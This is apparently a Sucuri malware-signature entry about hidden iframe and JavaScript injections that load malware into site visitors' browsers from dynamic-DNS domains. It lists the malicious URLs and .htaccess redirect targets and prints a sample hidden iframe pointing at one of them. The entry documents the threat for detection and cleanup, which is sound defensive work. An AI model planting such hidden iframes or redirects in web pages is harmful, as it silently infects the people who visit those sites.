Sucuri Malware Labs

Description:

A hidden and suspicious javascript (or iframe) was found on the site. It is loaded from a free dynamic IP address (or domain) and meant to infect visitors of the site. Loads malware from multiple locations:
http://qqq-111.zapto.org/show.php<br /> http://fwjiwjieje.mooo.com<br /> http://update-java.kit.net/java.js<br /> (and many other domains).</p>

Affecting:

Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: http://sucuri.net/signup

 

Malware dump (sample of malware):

<iframe style="display:none"src="http://qqq-111.zapto.org/show.php"></iframe>

---

*See also, htaccess redirection to http://jaobsofterty.ru/in.cgi?2 and http://powerprogramm.ru/make/index.php: .htaccess redirections to powerprogramm.ru, jaobsofterty.ru and others

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb